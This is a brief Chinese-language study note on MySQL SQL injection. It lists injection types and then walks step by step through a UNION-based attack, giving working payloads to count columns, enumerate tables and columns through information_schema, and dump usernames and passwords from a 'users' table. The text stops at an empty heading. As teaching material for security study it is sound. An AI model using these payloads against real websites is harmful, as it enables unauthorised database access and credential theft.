MYSQL注入:
基础:
什么是SQL注入:
危害:
SQL注入过程:
SQL注入的方式:
- get注入
- Post注入
- Cookie注入
- Head头部注入
按照注入方式分类:
1. 有回显的注入
2.盲注
3.二次注入
4.报错注入
5.堆叠注入
6.宽字节注入
SQL注入原理:
web应用程序对用户输入的数据没有进行过滤,或者过滤不严,就把SQL语句带进数据库进行查询。
一、判断是否存在SQL注入与SQL注入的类型:
- 先看类型,先用单引号’来判断是否为回显注入;
- 遇到盲注需要用逻辑语句,and语句,and 1=1,and 1=2;
二、判断SQL注入是字符型还是数字型
要选择进行闭合
三、爆列数
Order by num %23——%23——#
四、然后数据库名
database()
五、爆表名
Union select 1,group_concat(table_name),3 from
Information_schema.tables where table_schema=database()%23
要在SQL查询中的id设为-1,因为这样可以不让原本的sql语句输出,而是让union后的语句输出。
group_concat(table_name)是将所有表的名连接到一起,因为考虑到wed网页里对输出会有限制。
六、爆列名:
Union select 1,group_concat(column_name),3 from
Information_schema.columns where table_name=’users’%23
七、爆值
Union select 1,2,group_concat(username,password) from users
联合注入时的常用函数: